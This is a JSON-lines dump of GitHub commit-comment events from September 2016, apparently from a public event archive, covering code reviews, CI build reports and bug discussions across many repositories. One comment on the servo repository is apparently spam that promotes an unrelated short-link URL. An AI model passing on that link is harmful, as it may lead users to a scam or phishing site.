formatter\nplone/namedfile/tests/test_scaling.py:109:14: D001 found failIf( replace it with assertFalse\nplone/namedfile/tests/test_scaling.py:158:32: S001 found %s formatter\nplone/namedfile/tests/test_scaling.py:159:70: S001 found % formatter\nplone/namedfile/tests/test_scaling.py:166:32: S001 found %s formatter\nplone/namedfile/tests/test_scaling.py:167:72: S001 found % formatter\nplone/namedfile/tests/test_scaling.py:174:32: S001 found %s formatter\nplone/namedfile/tests/test_scaling.py:175:72: S001 found % formatter\nplone/namedfile/tests/test_scaling.py:215:32: S001 found %s formatter\nplone/namedfile/tests/test_scaling.py:216:70: S001 found % formatter\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-07T16:33:57Z"}
{"id":"4528820357","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18931293,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T16:34:31Z","updated_at":"2016-09-07T16:34:31Z","body":"Ok\r\nAfter you kill an enemy, it outputs the pick 1-3 thing several times before you can input. Idk why."}},"created_at":"2016-09-07T16:34:31Z"}
{"id":"4528823383","type":"CommitCommentEvent","actor":{"login":"jamflux"},"repo":{"name":"ingbrzy/MA-XML-8.0-SPANISH"},"payload":{"comment":{"id":18931301,"position":null,"line":null,"path":null,"commit_id":"8c05d56fef47a1ae1afef86d068d2eb6faa77fe6","created_at":"2016-09-07T16:35:03Z","updated_at":"2016-09-07T16:35:03Z","body":"Y por qué borraste cit?\r\nUna explicación?\r\n"}},"created_at":"2016-09-07T16:35:03Z"}
{"id":"4528825695","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18931306,"position":null,"line":null,"path":null,"commit_id":"714e7e1170a3aa127c1d11fb21d1fc418aa97cbb","created_at":"2016-09-07T16:35:27Z","updated_at":"2016-09-07T16:35:27Z","body":"FixCentroidForNonconvex (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1186 of 1186 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-714e7e1170a3aa127c1d11fb21d1fc418aa97cbb-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-714e7e1170a3aa127c1d11fb21d1fc418aa97cbb-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-714e7e1170a3aa127c1d11fb21d1fc418aa97cbb-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-35.94%25-green.svg)</a>\n"}},"created_at":"2016-09-07T16:35:27Z"}
{"id":"4528829015","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":18931318,"position":null,"line":null,"path":null,"commit_id":"64eba94cb2a85a4b15178c7e96b62153486a5575","created_at":"2016-09-07T16:36:03Z","updated_at":"2016-09-07T16:36:03Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#NUZHrUVKQWqkfmxmy0D1vg"}},"created_at":"2016-09-07T16:36:03Z"}
{"id":"4528831049","type":"CommitCommentEvent","actor":{"login":"Stebalien"},"repo":{"name":"hellerbarde/stapler"},"payload":{"comment":{"id":18931323,"position":null,"line":null,"path":null,"commit_id":"1eb0ca6ec99fc5f3e39342109b18f098d3ffe17d","created_at":"2016-09-07T16:36:24Z","updated_at":"2016-09-07T16:36:24Z","body":"@sdgathman That's a downstream packaging bug in Fedora (`more_itertools` is a separate package and stapler depends on it). Please report it on the Fedora bug tracker."}},"created_at":"2016-09-07T16:36:24Z"}
{"id":"4528835201","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/SynapseAPI"},"payload":{"comment":{"id":18931334,"position":null,"line":null,"path":null,"commit_id":"d274062addf3beeec541c6259ecdafbda286e4bd","created_at":"2016-09-07T16:37:09Z","updated_at":"2016-09-07T16:37:09Z","body":"@Creeperface01 Stop spamming."}},"created_at":"2016-09-07T16:37:09Z"}
{"id":"4528836141","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18931340,"position":null,"line":null,"path":null,"commit_id":"f3d116f100224a6bfcce475c61abe2ffa8e2e497","created_at":"2016-09-07T16:37:18Z","updated_at":"2016-09-07T16:37:18Z","body":"FixCentroidForNonconvex (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3d116f100224a6bfcce475c61abe2ffa8e2e497-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-07T16:37:18Z"}
{"id":"4528837706","type":"CommitCommentEvent","actor":{"login":"macool"},"repo":{"name":"noggalito/porttare-frontend"},"payload":{"comment":{"id":18931348,"position":40,"line":40,"path":"app/scripts/controllers/clients-controller.js","commit_id":"fe15c442403cc3f78a130864fc047c3c6305607c","created_at":"2016-09-07T16:37:34Z","updated_at":"2016-09-07T16:37:34Z","body":"nope."}},"created_at":"2016-09-07T16:37:34Z"}
{"id":"4528837982","type":"CommitCommentEvent","actor":{"login":"Infante007"},"repo":{"name":"ingbrzy/MA-XML-8.0-SPANISH"},"payload":{"comment":{"id":18931349,"position":null,"line":null,"path":null,"commit_id":"8c05d56fef47a1ae1afef86d068d2eb6faa77fe6","created_at":"2016-09-07T16:37:37Z","updated_at":"2016-09-07T16:37:37Z","body":"nada cosas del directo, se pone como antes y listo"}},"created_at":"2016-09-07T16:37:37Z"}
{"id":"4528840867","type":"CommitCommentEvent","actor":{"login":"con-f-use"},"repo":{"name":"cnlohr/esp8266ws2812i2s"},"payload":{"comment":{"id":18931361,"position":null,"line":null,"path":null,"commit_id":"c5eaa1a9637b9387114d849c5d1c14504f9e7f1c","created_at":"2016-09-07T16:38:09Z","updated_at":"2016-09-07T16:38:09Z","body":"And if you'll have be, I'll be there from minute one ^^"}},"created_at":"2016-09-07T16:38:09Z"}
{"id":"4528843849","type":"CommitCommentEvent","actor":{"login":"macool"},"repo":{"name":"noggalito/porttare-frontend"},"payload":{"comment":{"id":18931370,"position":17,"line":17,"path":"app/templates/client/new-edit.jade","commit_id":"fe15c442403cc3f78a130864fc047c3c6305607c","created_at":"2016-09-07T16:38:40Z","updated_at":"2016-09-07T16:38:40Z","body":":philosoraptor: creo que en algunos casos van a ser pasaportes, con letras y signos como `-`"}},"created_at":"2016-09-07T16:38:40Z"}
{"id":"4528848073","type":"CommitCommentEvent","actor":{"login":"macool"},"repo":{"name":"noggalito/porttare-frontend"},"payload":{"comment":{"id":18931379,"position":45,"line":45,"path":"app/templates/client/new-edit.jade","commit_id":"fe15c442403cc3f78a130864fc047c3c6305607c","created_at":"2016-09-07T16:39:21Z","updated_at":"2016-09-07T16:39:21Z","body":"igual, los teléfonos pueden otros muchos formatos\r\nhttps://github.com/stympy/faker#fakerphonenumber"}},"created_at":"2016-09-07T16:39:21Z"}
{"id":"4528852490","type":"CommitCommentEvent","actor":{"login":"macool"},"repo":{"name":"noggalito/porttare-frontend"},"payload":{"comment":{"id":18931389,"position":40,"line":40,"path":"app/scripts/controllers/clients-controller.js","commit_id":"fe15c442403cc3f78a130864fc047c3c6305607c","created_at":"2016-09-07T16:40:06Z","updated_at":"2016-09-07T16:40:06Z","body":"una función para success y otra para failure"}},"created_at":"2016-09-07T16:40:06Z"}
{"id":"4528854897","type":"CommitCommentEvent","actor":{"login":"wilsonrector"},"repo":{"name":"SRosenshein/bloccitV2"},"payload":{"comment":{"id":18931400,"position":16,"line":36,"path":"app/models/post.rb","commit_id":"934f54d6c7ab4ed636518ca6eea4afafd3f28edc","created_at":"2016-09-07T16:40:31Z","updated_at":"2016-09-07T16:40:31Z","body":"Semantically, this is better as `votes.create(value: 1, user: user)`"}},"created_at":"2016-09-07T16:40:31Z"}
{"id":"4528864773","type":"CommitCommentEvent","actor":{"login":"yossigil"},"repo":{"name":"SpartanRefactoring/Spartanizer"},"payload":{"comment":{"id":18931421,"position":null,"line":null,"path":null,"commit_id":"fe96b1ecca1b07bcb8e1220c5a001cf5eaa420d6","created_at":"2016-09-07T16:42:16Z","updated_at":"2016-09-07T16:42:16Z","body":"If your commit message was `Issue #116 tests` \r\ninstead of `Issue116 tests`, then it would have popped out in our \r\ntracing of the issue"}},"created_at":"2016-09-07T16:42:16Z"}
{"id":"4528866978","type":"CommitCommentEvent","actor":{"login":"aunpyz"},"repo":{"name":"CPE2017DataStuctAMB/CPE217-159-hw3-nb"},"payload":{"comment":{"id":18931431,"position":null,"line":null,"path":null,"commit_id":"d1ef078f838bafb35098ade16fcdb35413b9008b","created_at":"2016-09-07T16:42:39Z","updated_at":"2016-09-07T16:42:39Z","body":"Node previous -> Node prev"}},"created_at":"2016-09-07T16:42:39Z"}
{"id":"4528871385","type":"CommitCommentEvent","actor":{"login":"SRosenshein"},"repo":{"name":"SRosenshein/bloccitV2"},"payload":{"comment":{"id":18931445,"position":16,"line":36,"path":"app/models/post.rb","commit_id":"934f54d6c7ab4ed636518ca6eea4afafd3f28edc","created_at":"2016-09-07T16:43:26Z","updated_at":"2016-09-07T16:43:26Z","body":"Is the post instance implied from the after_create callback?"}},"created_at":"2016-09-07T16:43:26Z"}
{"id":"4528872696","type":"CommitCommentEvent","actor":{"login":"vaikas-google"},"repo":{"name":"bmelville/servicebroker"},"payload":{"comment":{"id":18931449,"position":85,"line":419,"path":"specs/sb/api.md","commit_id":"6801766f39de0f9f0e448edaead2fe1e14e86b6f","created_at":"2016-09-07T16:43:40Z","updated_at":"2016-09-07T16:43:40Z","body":"These don't really seem like credentials to me? Consider adding something like user/pass or so here"}},"created_at":"2016-09-07T16:43:40Z"}
{"id":"4528872960","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18931450,"position":null,"line":null,"path":null,"commit_id":"f0a4f74a23805f5e8d893acd409d85abd1832d33","created_at":"2016-09-07T16:43:42Z","updated_at":"2016-09-07T16:43:42Z","body":"Debian 7 apparently ships with `ld-gold`, but the compiler rejects `-fuse-ld=gold`."}},"created_at":"2016-09-07T16:43:42Z"}
{"id":"4528876571","type":"CommitCommentEvent","actor":{"login":"wilddom"},"repo":{"name":"Admidio/admidio"},"payload":{"comment":{"id":18931462,"position":null,"line":null,"path":null,"commit_id":"5e48908535bb93326eba5f51d048d444b7469ce4","created_at":"2016-09-07T16:44:21Z","updated_at":"2016-09-07T16:44:21Z","body":"Okay, I admit it, I only tested the update code. And I didn't notice that foreign key checks are temporarily disabled during the update. Well, in that case I think it will most probably fail in postgresql."}},"created_at":"2016-09-07T16:44:21Z"}
{"id":"4528883905","type":"CommitCommentEvent","actor":{"login":"bmelville"},"repo":{"name":"bmelville/servicebroker"},"payload":{"comment":{"id":18931489,"position":85,"line":419,"path":"specs/sb/api.md","commit_id":"6801766f39de0f9f0e448edaead2fe1e14e86b6f","created_at":"2016-09-07T16:45:40Z","updated_at":"2016-09-07T16:45:40Z","body":"Done!"}},"created_at":"2016-09-07T16:45:40Z"}
{"id":"4528884010","type":"CommitCommentEvent","actor":{"login":"wilsonrector"},"repo":{"name":"SRosenshein/bloccitV2"},"payload":{"comment":{"id":18931490,"position":16,"line":36,"path":"app/models/post.rb","commit_id":"934f54d6c7ab4ed636518ca6eea4afafd3f28edc","created_at":"2016-09-07T16:45:41Z","updated_at":"2016-09-07T16:45:41Z","body":"Yes, since you're not setting any data like `self.title = \"New Title\"`"}},"created_at":"2016-09-07T16:45:41Z"}
{"id":"4528893499","type":"CommitCommentEvent","actor":{"login":"cocoonfxmedia"},"repo":{"name":"cocoonfxmedia/cat"},"payload":{"comment":{"id":18931521,"position":null,"line":null,"path":null,"commit_id":"42fbe5b089d2a895931b48f5fb1df94b885da444","created_at":"2016-09-07T16:47:20Z","updated_at":"2016-09-07T16:47:20Z","body":"`<a href=\"test\">test</a>`"}},"created_at":"2016-09-07T16:47:20Z"}
{"id":"4528894811","type":"CommitCommentEvent","actor":{"login":"chevdor"},"repo":{"name":"ipfs/webui"},"payload":{"comment":{"id":18931524,"position":null,"line":null,"path":null,"commit_id":"52135a255b37216c37d5ddf69fa311621d1f5855","created_at":"2016-09-07T16:47:33Z","updated_at":"2016-09-07T16:47:33Z","body":"I think you want to update i18next.js as well."}},"created_at":"2016-09-07T16:47:33Z"}
{"id":"4528905865","type":"CommitCommentEvent","actor":{"login":"shorowit"},"repo":{"name":"NREL/OpenStudio-BEopt"},"payload":{"comment":{"id":18931549,"position":8,"line":61,"path":"measures/ResidentialGeometryNeighbors/measure.rb","commit_id":"7105d62d2ca0ac24a54a859754320689f3ee81b3","created_at":"2016-09-07T16:49:27Z","updated_at":"2016-09-07T16:49:27Z","body":"Typo: \"lest-most\".  \r\n\r\nPerhaps also include something about simulation runtime, like:\r\n\"Otherwise, only the minimal required surfaces are copied (...) in order to reduce simulation runtime.\""}},"created_at":"2016-09-07T16:49:27Z"}
{"id":"4528909875","type":"CommitCommentEvent","actor":{"login":"camilstaps"},"repo":{"name":"KDercksen/cloogle-cli"},"payload":{"comment":{"id":18931562,"position":null,"line":null,"path":null,"commit_id":"171117ea47f624c012dbed408b93d28baa4a47d8","created_at":"2016-09-07T16:50:11Z","updated_at":"2016-09-07T16:50:11Z","body":"For me, this does not work using python 2.7.9. Running `python2 clooglecli.py` gives me:\r\n\r\n```\r\nTraceback (most recent call last):\r\n  File \"clooglecli.py\", line 152, in <module>\r\n    data = get_data(**vars(args))\r\n  File \"clooglecli.py\", line 92, in get_data\r\n    response = get_response(s, **kwargs)\r\n  File \"clooglecli.py\", line 66, in get_response\r\n    s.send(payload)\r\n  File \"clooglecli.py\", line 45, in send\r\n    self.socket.send(bytes(json.dumps(msg), 'ascii'))\r\nTypeError: str() takes at most 1 argument (2 given)\r\n```\r\n\r\nHence my changing the shebang to python3."}},"created_at":"2016-09-07T16:50:11Z"}
{"id":"4528911828","type":"CommitCommentEvent","actor":{"login":"TiagoBezerra"},"repo":{"name":"andreqbs/e-star"},"payload":{"comment":{"id":18931571,"position":null,"line":null,"path":null,"commit_id":"ed50029629059c9115353a8f2c8f0309c51655b5","created_at":"2016-09-07T16:50:30Z","updated_at":"2016-09-07T16:50:30Z","body":"Modelo atualizado para \"New ER Diagram_3_.erdplus\" e \"erdplus-diagrama_3_.png\"."}},"created_at":"2016-09-07T16:50:30Z"}
{"id":"4528913695","type":"CommitCommentEvent","actor":{"login":"caseycoates"},"repo":{"name":"caseycoates/genesis"},"payload":{"comment":{"id":18931575,"position":null,"line":null,"path":null,"commit_id":"cdf6e6fb03abd3a98e14564073d1896196f94e05","created_at":"2016-09-07T16:50:49Z","updated_at":"2016-09-07T16:50:49Z","body":"![roger](https://cloud.githubusercontent.com/assets/6656401/18320881/8945bd54-74e0-11e6-8979-01070b22c720.png)\r\n"}},"created_at":"2016-09-07T16:50:49Z"}
{"id":"4528918148","type":"CommitCommentEvent","actor":{"login":"DesmondFox"},"repo":{"name":"DesmondFox/seaFight"},"payload":{"comment":{"id":18931582,"position":93,"line":127,"path":"field.cpp","commit_id":"1339cd86077ed264bd797ffdddf0f03da29a6733","created_at":"2016-09-07T16:51:39Z","updated_at":"2016-09-07T16:51:39Z","body":"Позже надо будет немного переделать код в этом месте. Сделать его более компактным и понятным"}},"created_at":"2016-09-07T16:51:39Z"}
{"id":"4528918249","type":"CommitCommentEvent","actor":{"login":"THEMVFFINMAN"},"repo":{"name":"THEMVFFINMAN/Python-Games"},"payload":{"comment":{"id":18931583,"position":null,"line":null,"path":null,"commit_id":"bc90f7251ecc35b56f1e9b0948799e9b9ab7d523","created_at":"2016-09-07T16:51:40Z","updated_at":"2016-09-07T16:51:40Z","body":"Also added 2 functions to be able to normalize x and y pixel locations to their points on my 2d array and connected graph"}},"created_at":"2016-09-07T16:51:40Z"}
{"id":"4528921050","type":"CommitCommentEvent","actor":{"login":"IgnusG"},"repo":{"name":"metjus/Calculator"},"payload":{"comment":{"id":18931589,"position":null,"line":null,"path":null,"commit_id":"f9cc6c2d4f11f41f760aee241862982b231a7aec","created_at":"2016-09-07T16:52:10Z","updated_at":"2016-09-07T16:52:10Z","body":"Lets take it step by step:\r\n\r\n1. Group functions by what they do\r\n  ```javascript\r\n  var Ops = {\r\n    add: function ( ... \r\n  }\r\n  ```\r\n\r\n2. Create variables that store elements\r\n  ```javascript\r\n  var display = document.getElementById('result');\r\n  var allClearBtn = ...;\r\n  ...\r\n  ```\r\n\r\n3. Create functions that perform DOM ([_Document Object Model_](https://developer.mozilla.org/en-US/docs/Web/API/Document_Object_Model/Introduction)) manipulations and **NOTHING ELSE**\r\n  ```javascript\r\n  var Calc = {\r\n    clearDisplay: function() {\r\n      allClearBtn.innerHTML = \"\"\r\n    },\r\n    showDigit: function(digit) {\r\n      // Just an example\r\n      result.innerHTML += digit;\r\n    } ...\r\n  }\r\n  ```\r\n\r\nThis way your code will be more legible and you will make less mistakes by forcing yourself to write in a modular way (meaning eg. `Ops` is a module and is independent of everything else)"}},"created_at":"2016-09-07T16:52:10Z"}
{"id":"4528930534","type":"CommitCommentEvent","actor":{"login":"aquach"},"repo":{"name":"pennyapp/cordova-plugin-detect-screenshot"},"payload":{"comment":{"id":18931621,"position":null,"line":null,"path":null,"commit_id":"6ec95b6586737adfa0d80f6c69936ac4b5eb9e6f","created_at":"2016-09-07T16:53:47Z","updated_at":"2016-09-07T16:53:47Z","body":"Here you go! https://github.com/Restocks/cordova-plugin-detect-screenshot/pull/3"}},"created_at":"2016-09-07T16:53:47Z"}
{"id":"4528934083","type":"CommitCommentEvent","actor":{"login":"AdiUser"},"repo":{"name":"AdiUser/gitHubResp"},"payload":{"comment":{"id":18931627,"position":null,"line":null,"path":null,"commit_id":"5a56b46ab5a1059fb9e8ede245430f372763df5a","created_at":"2016-09-07T16:54:25Z","updated_at":"2016-09-07T16:54:25Z","body":"About Project !!"}},"created_at":"2016-09-07T16:54:25Z"}
{"id":"4528937096","type":"CommitCommentEvent","actor":{"login":"bhajer3"},"repo":{"name":"medseek-engineering/ccs-model-predictions"},"payload":{"comment":{"id":18931636,"position":18,"line":40,"path":"src/main/python/helper.py","commit_id":"2357947dcbe7b70ecfbb5e7592818a5f8c89fa9b","created_at":"2016-09-07T16:54:58Z","updated_at":"2016-09-07T16:54:58Z","body":"right, but only division was not a string correct? And you made it a string above. So the if df[columnName].dtypes == object should not be necessary now. Not a big deal. Thanks. "}},"created_at":"2016-09-07T16:54:58Z"}
{"id":"4528938950","type":"CommitCommentEvent","actor":{"login":"finnoleary"},"repo":{"name":"kragen/knuth-interview-2006"},"payload":{"comment":{"id":18931641,"position":22,"line":705,"path":"README.md","commit_id":"1eab73517d7f85fea9a61d3fd0e7a0f25120c069","created_at":"2016-09-07T16:55:17Z","updated_at":"2016-09-07T16:55:17Z","body":"> forget that I said raising\r\n\r\nAnd yet, we can never forget now. "}},"created_at":"2016-09-07T16:55:17Z"}
{"id":"4528939213","type":"CommitCommentEvent","actor":{"login":"AdiUser"},"repo":{"name":"AdiUser/gitHubResp"},"payload":{"comment":{"id":18931643,"position":null,"line":null,"path":null,"commit_id":"5faec26e7a6c10a8330bf6e597367e364958efa8","created_at":"2016-09-07T16:55:19Z","updated_at":"2016-09-07T16:55:19Z","body":"About Project !!\r\n\r\n"}},"created_at":"2016-09-07T16:55:19Z"}
{"id":"4528939365","type":"CommitCommentEvent","actor":{"login":"aerin"},"repo":{"name":"aerin/prehist"},"payload":{"comment":{"id":18931644,"position":23,"line":51,"path":"server.js","commit_id":"ddb492d65fe461b8d306ea132c85bcb1af62633c","created_at":"2016-09-07T16:55:21Z","updated_at":"2016-09-07T16:55:21Z","body":"Убрать!"}},"created_at":"2016-09-07T16:55:21Z"}
{"id":"4528939490","type":"CommitCommentEvent","actor":{"login":"denizy"},"repo":{"name":"denizy/cora"},"payload":{"comment":{"id":18931645,"position":null,"line":null,"path":null,"commit_id":"6a53c7b9b25eb8c33d3de92f00481310c16fdd5c","created_at":"2016-09-07T16:55:22Z","updated_at":"2016-09-07T16:55:22Z","body":"Fixed some inconsistencies regarding references with number of chromosomes >127"}},"created_at":"2016-09-07T16:55:22Z"}
{"id":"4528942340","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":18931651,"position":null,"line":null,"path":null,"commit_id":"c50facfda436bf119a59a63d2eef2038eac03d98","created_at":"2016-09-07T16:55:51Z","updated_at":"2016-09-07T16:55:51Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#eivuaDIuSJKSjorhxso92g"}},"created_at":"2016-09-07T16:55:51Z"}
{"id":"4528944717","type":"CommitCommentEvent","actor":{"login":"DomT4"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":18931656,"position":null,"line":null,"path":null,"commit_id":"81e08e7d69519ba410c98cabfb10a85a7e1afdbb","created_at":"2016-09-07T16:56:17Z","updated_at":"2016-09-07T16:56:17Z","body":"@zmwangx Heads up that you're GPG signing everyone's commits. Up to you, but we don't tend to do that."}},"created_at":"2016-09-07T16:56:17Z"}
{"id":"4528944839","type":"CommitCommentEvent","actor":{"login":"kalidasya"},"repo":{"name":"SonarQubeCommunity/sonar-css"},"payload":{"comment":{"id":18931657,"position":null,"line":null,"path":null,"commit_id":"58d3493abdb201c1fb6a82be2615cf1ce9ddf4dd","created_at":"2016-09-07T16:56:18Z","updated_at":"2016-09-07T16:56:18Z","body":"@racodond whats the reason?"}},"created_at":"2016-09-07T16:56:18Z"}
{"id":"4528951852","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"bantuist/bloc-jams"},"payload":{"comment":{"id":18931671,"position":49,"line":49,"path":"scripts/album.js","commit_id":"bdb0240a48a4baec8545809ead68a2dd8d03f603","created_at":"2016-09-07T16:57:32Z","updated_at":"2016-09-07T16:57:32Z","body":"What's up with your tabbing here? Everything should be inline"}},"created_at":"2016-09-07T16:57:32Z"}
{"id":"4528953515","type":"CommitCommentEvent","actor":{"login":"kernelerrorZA"},"repo":{"name":"kernelerrorZA/jdiesel"},"payload":{"comment":{"id":18931674,"position":null,"line":null,"path":null,"commit_id":"73ba227c99975e0a0cbbe339344cb3dd560fff61","created_at":"2016-09-07T16:57:49Z","updated_at":"2016-09-07T16:57:49Z","body":"#1 "}},"created_at":"2016-09-07T16:57:49Z"}
{"id":"4528961254","type":"CommitCommentEvent","actor":{"login":"antialias"},"repo":{"name":"PeteJodo/fluxible-redux-dispatcher"},"payload":{"comment":{"id":18931689,"position":63,"line":63,"path":"test/spec.js","commit_id":"6a9668a0117cb3a8baa63561da15e3987a890f0d","created_at":"2016-09-07T16:59:11Z","updated_at":"2016-09-07T16:59:11Z","body":"[`assert.throws`](https://www.npmjs.com/package/assert#assertthrowsblock-error-message) would lead to cleaner code here.\r\n"}},"created_at":"2016-09-07T16:59:11Z"}
{"id":"4528962096","type":"CommitCommentEvent","actor":{"login":"kjohnson"},"repo":{"name":"wpninjas/ninja-forms"},"payload":{"comment":{"id":18931691,"position":null,"line":null,"path":null,"commit_id":"454c078679e9dcb2e50a662ea977901a1d64dd65","created_at":"2016-09-07T16:59:19Z","updated_at":"2016-09-07T16:59:19Z","body":"Closes #1706"}},"created_at":"2016-09-07T16:59:19Z"}
{"id":"4528964760","type":"CommitCommentEvent","actor":{"login":"JivaroFAD"},"repo":{"name":"Ingwie/NextStepRc-2.18"},"payload":{"comment":{"id":18931693,"position":null,"line":null,"path":null,"commit_id":"11e9a50941cc6ac78dbc90fdeeb4ed0095e368b4","created_at":"2016-09-07T16:59:47Z","updated_at":"2016-09-07T16:59:47Z","body":":+1: "}},"created_at":"2016-09-07T16:59:47Z"}
{"id":"4528966140","type":"CommitCommentEvent","actor":{"login":"chrisz"},"repo":{"name":"chrisz/pyhusmow"},"payload":{"comment":{"id":18931695,"position":null,"line":null,"path":null,"commit_id":"20ade04c161e6c1579c00bff82925fba672357de","created_at":"2016-09-07T17:00:01Z","updated_at":"2016-09-07T17:00:01Z","body":"Somebody uses this script on its home automation box and it seems he can only parse xml. I don't really like XML but it could be useful for status command.\r\n\r\nIf the server accepts json in requests, it could be a good idea to replace my \"handcraft\" XML with nice dict converted to json :-)."}},"created_at":"2016-09-07T17:00:01Z"}
{"id":"4528966918","type":"CommitCommentEvent","actor":{"login":"emmacunningham"},"repo":{"name":"trevorcai/react-starter"},"payload":{"comment":{"id":18931696,"position":45,"line":24,"path":"ui/search.jsx","commit_id":"58a24f394b9468add37759fad182b12a3318a804","created_at":"2016-09-07T17:00:10Z","updated_at":"2016-09-07T17:00:10Z","body":"This can be made slightly more readable by abstracting out into functions that handle specific aspects of what you need to render this part of the component.  Instead of calling `movies.map()` here, you can define a function `renderMovies` that does that for you.\r\n\r\n``` js\r\nconst renderMovies = () => movies.map( ... );\r\n```\r\n\r\nNote that while you could have renderMovies just replicate the code you have in your return, you can provide further abstraction by having `movies.map` call another function that contains the logic for rendering one movie.\r\n\r\nSo, all together, this would look like:\r\n\r\n```js\r\n  const renderMovie = (movie, index) =>\r\n    (<div key={index} className=\"moviebox\">\r\n      <Link to={`/movies/${movie.imdbID}`}>\r\n        {`${movie.Title} (${movie.Year})`}\r\n      </Link>\r\n    </div>);\r\n\r\n  const renderMovies = () => movies.map(renderMovie);\r\n```\r\n\r\nThen, in your return, in place of `{movies.map(...)}` you can simply call `{renderMovies()}`."}},"created_at":"2016-09-07T17:00:10Z"}
{"id":"4528968161","type":"CommitCommentEvent","actor":{"login":"ferhung-mtk"},"repo":{"name":"Pablito2020/android_device_Xiaomi_HM2014011"},"payload":{"comment":{"id":18931697,"position":null,"line":null,"path":null,"commit_id":"c7e0c82fef6d56d601f658efa439df3d07b5c4e1","created_at":"2016-09-07T17:00:22Z","updated_at":"2016-09-07T17:00:22Z","body":"What is this WIFI problem?"}},"created_at":"2016-09-07T17:00:22Z"}
{"id":"4528973370","type":"CommitCommentEvent","actor":{"login":"zmwangx"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":18931705,"position":null,"line":null,"path":null,"commit_id":"81e08e7d69519ba410c98cabfb10a85a7e1afdbb","created_at":"2016-09-07T17:01:12Z","updated_at":"2016-09-07T17:01:12Z","body":"@DomT4 Yeah. What about `--no-gpg-sign` in `brew pull`? "}},"created_at":"2016-09-07T17:01:12Z"}
{"id":"4528973646","type":"CommitCommentEvent","actor":{"login":"antialias"},"repo":{"name":"PeteJodo/fluxible-redux-dispatcher"},"payload":{"comment":{"id":18931707,"position":12,"line":12,"path":"package.json","commit_id":"6a9668a0117cb3a8baa63561da15e3987a890f0d","created_at":"2016-09-07T17:01:15Z","updated_at":"2016-09-07T17:01:15Z","body":"What's wrong with `'function' === typeof foo`?"}},"created_at":"2016-09-07T17:01:15Z"}
{"id":"4528977176","type":"CommitCommentEvent","actor":{"login":"AlexandreMasta"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18931713,"position":null,"line":null,"path":null,"commit_id":"57594b3ddb619e61181d0067e4ea7e66211a7e6b","created_at":"2016-09-07T17:01:49Z","updated_at":"2016-09-07T17:01:49Z","body":"Woow...another super +elo patch!!\r\n\r\nCongrats!"}},"created_at":"2016-09-07T17:01:49Z"}
{"id":"4528981022","type":"CommitCommentEvent","actor":{"login":"Sendoushi"},"repo":{"name":"servo/servo"},"payload":{"comment":{"id":18931720,"position":null,"line":null,"path":null,"commit_id":"10d4da7e1529fb4e00e3230a874d0af45df7de0c","created_at":"2016-09-07T17:02:32Z","updated_at":"2016-09-07T17:02:32Z","body":"Hi! \n\nHave you ever thought about how would the cities  of  the future  look  like? I found some   interesting stuff about that here  <http://propuzefro.qtboi.com/e4xqxlns>\n\nBest regards, Alberto Martinez\n\n\n"}},"created_at":"2016-09-07T17:02:32Z"}
{"id":"4528990190","type":"CommitCommentEvent","actor":{"login":"k000kc"},"repo":{"name":"k000kc/java-a-to-z"},"payload":{"comment":{"id":18931738,"position":null,"line":null,"path":null,"commit_id":"7f289fee96774ab232ff47cd1b4944eb126e1250","created_at":"2016-09-07T17:04:13Z","updated_at":"2016-09-07T17:04:13Z","body":"del"}},"created_at":"2016-09-07T17:04:13Z"}
{"id":"4528991939","type":"CommitCommentEvent","actor":{"login":"zmwangx"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":18931741,"position":null,"line":null,"path":null,"commit_id":"81e08e7d69519ba410c98cabfb10a85a7e1afdbb","created_at":"2016-09-07T17:04:31Z","updated_at":"2016-09-07T17:04:31Z","body":"Of course I could also unset `commit.gpgSign` for homebrew-core only, but just wondering if it's a good idea to apply it for everyone, whether or not `commit.gpgSign` is set."}},"created_at":"2016-09-07T17:04:31Z"}
